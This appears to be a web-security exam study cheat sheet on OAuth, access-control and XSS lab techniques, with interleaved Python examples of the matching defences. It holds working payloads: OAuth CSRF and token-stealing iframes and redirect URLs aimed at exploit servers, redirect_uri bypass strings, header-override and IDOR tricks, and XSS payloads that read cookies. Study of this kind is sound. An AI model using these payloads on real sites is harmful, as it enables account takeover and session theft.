BSCP3
## Token not bound with the username

Notice that the client application (the blog website) receives some basic information about the user from the OAuth service. It then logs the user in by sending a POST request containing this information to its own `/authenticate` endpoint, along with the access token.

1. In implicit grant type, once your user gets the token, check if you can use it to make a request for some other user, by changing the username
4. Send the POST `/authenticate` …
## OAuth

- Login with Social Media
- Redirecting to social media
- Next Post
- `/.well-known/oauth-authorization-server`
- `/.well-known/openid-configuration` URL
- If `Attach with social media`, state parameter not present might be the answer

## OpenID Dynamic Client Registration ( LOGO URI / LOGO URL )

`https://oauth-0aaa006a033534708255dbfe0230008b.oauth-server.net/.well-known/openid-configuration`

If OPEN ID configuration is found & OAuth login is present on the OAUTH host, this mi…

Request 2 : Change the client ID with the one received in response

```http
GET /client/AnYuv47ARWOvh886310_z/logo HTTP/2
Host: oauth-0aaa006a033534708255dbfe0230008b.oauth-server.net
Cookie: _session=J82AfRm26PDavf54GTF0V; _session.legacy=J82AfRm26PDavf54GTF0V
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: …
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
```
## STATE Parameter Not Present

- … authorization code to link the social media account with the user account: `oauth_linking?code=<code>` ( do not forget to DROP this request, as we want to make sure the token remains unused )
- Since there is no state parameter, we can use this token as a CSRF injection vector, by adding it to an iframe and sending it to the victim/admin ( comments ) or via EXPLOIT SERVER

COPY URL & DROP:

```http
GET /oauth-linking?code=gF3JqG69oIp7MLD622S5uDnWqFlHa1ydShJsiqgh2Iy HTTP/2
Host: 0a7000bf04563a1c82d5881000ae007c.web-security-academy.net
Cookie: session=udMr3rO72dqtLQVdTbU4bVdyFmcA0T7M
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 …
```

## Unvalidated `redirect_uri`

- … payload for the `/auth` request: change the `redirect_uri` to your attacker server's IP, where the CSRF payload is present, and send it to the victim
- Once the victim clicks on the link, we'll get the access token; now when the website makes a request to `/callback?code=<code>` to authenticate you, simply replace this code with the one you captured.
- Common Bypass:
  - `https://default-host.com&@foo.evil-user.net`
  - `https://default-host.com#@bar.evil-…`

EXPLOIT SERVER:

```html
<iframe src="https://oauth-0a9900740305464781430fa5027a0066.oauth-server.net/auth?client_id=zgpyqu5w9sjvtf159a084&redirect_uri=https://exploit-0ae000cf032d46538174106101b30048.exploit-server.net/exploit&response_type=code&scope=openid%20profile%20email"></iframe>
```

## Open Redirect with OAuth 2.0

1. … URI mismatch error.
2. We have a next post functionality which is vulnerable to open redirect: `https://0a5d002e0375205a80980d0b00a40069.web-security-academy.net/post/next?path=https://exploit-0a8a0073032020f780570cdb0192004d.exploit-server.net/exploit`
3. We'll use this in our iframe, deliver it, get the token & login into administrator's account
4. Intercept the request to `/me` and change the token in …

Payload:

`…3ea208880560bfa02d100ff.oauth-server.net/auth?client_id=mtyttcqiktkjol7896w7l&redirect_uri=https://0a5d002e0375205a80980d0b00a40069.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0a8a0073032020f780570cdb0192004d.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile`
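Added example, not part of these notes and not code from PortSwigger or any lab: a minimal Python sketch of the two defences the three OAuth items above probe for. On the authorization-server side, `redirect_uri` is accepted only on an exact match against a registered value, beside the prefix-style check that the `&@` and `/../` bypasses listed above walk through; on the client side, a per-session `state` value is minted before the redirect and required on the callback, which is what makes the planted `oauth-linking?code=<code>` link useless to an attacker. `REGISTERED_REDIRECT_URIS`, `demo-client`, `/oauth-callback` and the session dicts are constructed for this example.

```python
import hmac
import posixpath
import secrets
from urllib.parse import urlsplit

# Constructed registration table (hypothetical client and redirect URI):
# client_id -> the exact redirect URIs registered at onboarding.
REGISTERED_REDIRECT_URIS = {
    "demo-client": {"https://default-host.com/oauth-callback"},
}


def weak_prefix_check(registered: str, requested: str) -> bool:
    """The check the common bypasses defeat: anything that merely starts with
    the registered value passes, so `&@`, `#@` and `/../` tricks all go through."""
    return requested.startswith(registered)


def strict_redirect_check(client_id: str, requested: str) -> bool:
    """Authorization-server side: exact string match against the registered
    URIs, then a sanity parse so that even a registered URI can never carry
    userinfo, a fragment or dot-segments."""
    if requested not in REGISTERED_REDIRECT_URIS.get(client_id, ()):
        return False
    parts = urlsplit(requested)
    if parts.scheme != "https" or "@" in parts.netloc or parts.fragment:
        return False
    return posixpath.normpath(parts.path) == parts.path


def begin_authorization(session: dict) -> str:
    """Client side, before redirecting the browser to /auth: mint an
    unguessable state value and bind it to this browser session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state


def accept_callback(session: dict, params: dict) -> bool:
    """Client side, on /oauth-linking or /callback: consume the code only if
    the request carries the state minted for this session. A link or iframe
    planted by someone else was not minted here, so it never matches."""
    expected = session.pop("oauth_state", None)  # one-time use
    presented = params.get("state")
    if not expected or not presented:
        return False
    return hmac.compare_digest(expected, presented)


if __name__ == "__main__":
    browser = {}
    state = begin_authorization(browser)
    print("genuine callback accepted:", accept_callback(dict(browser), {"code": "c", "state": state}))
    print("planted link without state accepted:", accept_callback(dict(browser), {"code": "c"}))
    for uri in ("https://default-host.com&@foo.evil-user.net",
                "https://default-host.com/oauth-callback/../post/next?path=https://evil.example/"):
        print(uri, "| prefix:", weak_prefix_check("https://default-host.com", uri),
              "| strict:", strict_redirect_check("demo-client", uri))
```

The exact-match rule is what closes the open-redirect chain as well: `/oauth-callback/../post/next?...` is not the registered string, so it is refused before any path normalisation on the client could turn it into the redirect.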
# Access Control

## Unprotected admin functionality

1. Look for different places ( robots.txt, or do client side code review to find any important end-point )

## Access Controlled By Request Parameter

1. Check if any request parameter is used for access control, could be something in co…
## Modify Access Control Through Form Submission in user profile

1. Check what all update functionalities are present in the profile section, for example : if there's an email update functionality, update your email & notice the response.
   - Do you see any access control related parameters?
   - Can you submit the request with changed roleid? `roleid:"2"` -> `roleid:"1"`
## Bypass Access Control Via Request Headers

`X-Original-URL`, `X-Rewrite-URL`

1. Find out the end-point you want to access & try to access it.
2. If you fail, try different headers to overwrite the URL & bypass it

```http
POST / HTTP/1.1
X-Original-URL: /admin/deleteUser
...
```
## Changed Request Method

1. Change the HTTP request method and access the page
## Case Sensitive URL Bypass

1. If the validation mechanism is case-sensitive, the website will treat `/admin/deleteuser` & `ADMIN/DELETEUSER` as different end-points
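Added example, not part of these notes: a Python sketch of the server-side fix that covers the header, method and case items above together. The authorization decision is taken on the path that is actually routed, after one normalisation (query stripped, percent-decoded, dot-segments collapsed, case-folded), for every HTTP method, and `X-Original-URL` / `X-Rewrite-URL` are simply never consulted. The `dispatch_vulnerable` function models the front-end-filter-plus-back-end-rewrite layout the bypasses rely on, so the two can be compared on the same requests. `PROTECTED_PREFIXES`, the request dicts and the session dicts are constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed policy: normalized path prefix -> role allowed to reach it.
PROTECTED_PREFIXES = {"/admin": "admin"}


def normalize_path(raw_path: str) -> str:
    """Canonical form for every authorization decision: drop the query,
    percent-decode, collapse dot-segments and repeated slashes, case-fold."""
    path = unquote(raw_path.split("?", 1)[0])
    path = posixpath.normpath("/" + path.lstrip("/"))
    return path.lower()


def required_role(normalized_path: str):
    """Role needed for an already-normalized path, or None if it is public."""
    for prefix, role in PROTECTED_PREFIXES.items():
        if normalized_path == prefix or normalized_path.startswith(prefix + "/"):
            return role
    return None


def dispatch_vulnerable(request: dict, session: dict):
    """Layout the bypasses above rely on: a front-end check on the raw request
    line (case-sensitive, path only), then a back-end that honours
    X-Original-URL / X-Rewrite-URL when picking the handler.
    Returns (status, path of the handler that would run)."""
    if request["path"].startswith("/admin") and session.get("role") != "admin":
        return 403, None
    headers = request.get("headers", {})
    routed = headers.get("X-Original-URL") or headers.get("X-Rewrite-URL") or request["path"]
    return 200, routed


def dispatch_fixed(request: dict, session: dict):
    """Authorize on the path that is actually routed, after normalization,
    for every HTTP method; URL-override headers are not looked at."""
    routed = normalize_path(request["path"])
    role = required_role(routed)
    if role is not None and session.get("role") != role:
        return 403, None
    return 200, routed


if __name__ == "__main__":
    user = {"role": "user"}
    probes = [
        {"method": "POST", "path": "/", "headers": {"X-Original-URL": "/admin/deleteUser"}},
        {"method": "GET", "path": "/ADMIN/DELETEUSER", "headers": {}},
        {"method": "GET", "path": "/static/../admin/deleteUser?username=carlos", "headers": {}},
    ]
    for req in probes:
        print(req["method"], req["path"], req["headers"],
              "| vulnerable:", dispatch_vulnerable(req, user),
              "| fixed:", dispatch_fixed(req, user))
```

Normalising once and matching on the result is the point: the front-end filter in `dispatch_vulnerable` fails on case and on headers because it compares raw bytes and then lets another component change the route after the check.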
## IDOR

1. Try to look for some parameter that might be used to identify the user. For example : `userID=4`, try to change it to 3, 2, or 1.
## Exposed Unpredictable userID / Exposed user password in response

1. The victim's userID might be exposed in some other places on the website, like comments, blog author etc.
2. Study the response & check if it returns the password or any other crucial element
## Multi Step Process

… the final page only if it has gone through the first two.

# Example :

Normal Flow : home -> page1 -> page2 -> page3
Vuln Flow : home -> page1 -> page3

# Example

Req 1 : `GET /admin/update?user=carlos&action=upgrade`
Req 2 : `GET /admin/update?user=carlos&confirmed=yes&action=upgrade`
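Added example, not part of these notes: a Python sketch of what makes the second request above safe to expose. `confirmed=yes` is just a parameter anyone can type, so step 1 records the intent server side and returns a one-time token bound to the admin session and the target user; step 2 is honoured only if that token is presented, is still fresh, and has not been used. `PENDING_ACTIONS`, `TOKEN_TTL_SECONDS`, the `now` parameter (injected clock for testing) and the session dicts are constructed for this example.

```python
import secrets
import time
from typing import Optional

# Constructed in-memory store of pending privileged actions (a real service
# would keep this in the session store or a database): token -> record.
PENDING_ACTIONS: dict = {}
TOKEN_TTL_SECONDS = 300


def start_upgrade(admin_session: dict, username: str, now: Optional[float] = None) -> str:
    """Step 1 (GET /admin/update?user=...&action=upgrade): record the intent
    server side and return a one-time token that step 2 must present."""
    if admin_session.get("role") != "admin":
        raise PermissionError("admin only")
    token = secrets.token_urlsafe(24)
    PENDING_ACTIONS[token] = {
        "user": username,
        "action": "upgrade",
        "by": admin_session["uid"],
        "ts": time.time() if now is None else now,
    }
    return token


def confirm_upgrade(admin_session: dict, username: str, token: Optional[str],
                    now: Optional[float] = None) -> bool:
    """Step 2 (...&confirmed=yes): `confirmed=yes` by itself proves nothing.
    The request must also carry a live token minted by step 1, for the same
    admin session and the same target user; the token is consumed on use."""
    if admin_session.get("role") != "admin":
        return False
    record = PENDING_ACTIONS.pop(token, None) if token else None  # single use
    if record is None:
        return False
    if record["by"] != admin_session["uid"] or record["user"] != username:
        return False
    current = time.time() if now is None else now
    if current - record["ts"] > TOKEN_TTL_SECONDS:
        return False
    return True  # the upgrade of `username` would be applied here


if __name__ == "__main__":
    admin = {"role": "admin", "uid": 1}
    print("step 2 alone:", confirm_upgrade(admin, "carlos", None))
    token = start_upgrade(admin, "carlos")
    print("step 1 then step 2:", confirm_upgrade(admin, "carlos", token))
    print("replayed token:", confirm_upgrade(admin, "carlos", token))
```

Binding the token to the admin's own session id is what stops a captured step-1 token from being replayed by a different account, and the TTL keeps an abandoned step 1 from lingering as a standing authorisation.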
## Referer Based Access Control

The Referer header will be checked for access control, for example : a request made to `/admin/deleteUser` will expect the Referer header to have `/admin` in it, to make sure it is generated from the admin panel only.
`<script>alert(1)</script>`

- Search Bar
- Comment Section
- DOM Sinks
- Cookie with httpOnly not set

## With most tags & attributes blocked

1. Identify which tags are allowed: `<§>`
2. Identify what attributes/events are allowed: `<body%20§§=1>`

## Custom Tags

`<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#x';`

## Event Handlers & Href Blocked

`<svg><a><animate+attributeName=href+values=javascript:alert(1)/><text+x=20+y=20>Click me</text></a>`
## SVG Markup Allowed

1. If payloads like `<svg>`, `<animatetransform>`, `<title>`, and `<image>` are allowed
2. Identify what events are allowed

- `<§>`
- `<svg><animatetransform%20§§=1>`
- `<svg><animatetransform onbegin=alert(1)>`
## Angular Brackets Encoded

`"onmouseover="alert(1)`

## Quotes HTML Encoded

Put this into a href ( eg : website URL ): `javascript:alert(1)`

`script><script>alert(1)</script>`
## With Single Quote getting Backslash escaped ( JS Context )

For example, suppose that the input:

`';alert(document.domain)//`

gets converted to:

`\';alert(document.domain)//`

You can now use the alternative payload:

`\';alert(document.domain)//`

which gets converted to:

`\\';alert(document.domain)//`
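Added example, not part of these notes: the quote-only escaping the entry above describes, written out in Python beside a proper encoder for a single-quoted JavaScript string, plus a small scanner that reads a literal the way a JavaScript lexer does (backslash consumes the next character, an unescaped quote ends the literal). Running both payloads through both encoders shows why the backslash payload escapes the weak filter and why it does not escape the correct one. Function names and the `render_inline_script` template are constructed.

```python
def escape_quote_only(value: str) -> str:
    """The filter the entry above describes: a single quote becomes \\' and
    nothing else is touched. A backslash supplied by the attacker then pairs
    with the backslash the filter adds, leaving the quote unescaped."""
    return value.replace("'", "\\'")


def js_string_encode(value: str) -> str:
    """Proper encoding for a value placed inside a single-quoted JS string:
    backslash first (so an attacker-supplied backslash cannot pair with the
    escape added for the quote), then quotes, then characters that could end
    the script block or the line."""
    out = []
    for ch in value:
        if ch == "\\":
            out.append("\\\\")
        elif ch == "'":
            out.append("\\'")
        elif ch == '"':
            out.append('\\"')
        elif ch in "<>/&\n\r\u2028\u2029":
            out.append("\\u%04x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def literal_terminates_early(encoded: str) -> bool:
    """Read `encoded` as the body of a single-quoted JavaScript literal:
    a backslash consumes the next character, an unescaped quote ends the
    literal. True means the remainder of the payload would run as code."""
    i = 0
    while i < len(encoded):
        if encoded[i] == "\\":
            i += 2
            continue
        if encoded[i] == "'":
            return True
        i += 1
    return False


def render_inline_script(value: str) -> str:
    """Hypothetical template: the page embeds `value` inside a script block."""
    return "<script>var q = '" + js_string_encode(value) + "';</script>"


if __name__ == "__main__":
    for payload in ("';alert(document.domain)//", "\\';alert(document.domain)//"):
        weak = escape_quote_only(payload)
        good = js_string_encode(payload)
        print(repr(payload))
        print("  quote-only ->", weak, "| breaks out:", literal_terminates_early(weak))
        print("  js encoded ->", good, "| breaks out:", literal_terminates_early(good))
```

The order of the replacements is the whole fix: because `js_string_encode` doubles the backslash before it escapes the quote, the attacker's `\` can never be the character that neutralises the added escape, and encoding `<`, `>` and `/` as `\uXXXX` keeps a `</script>` inside the value from closing the block.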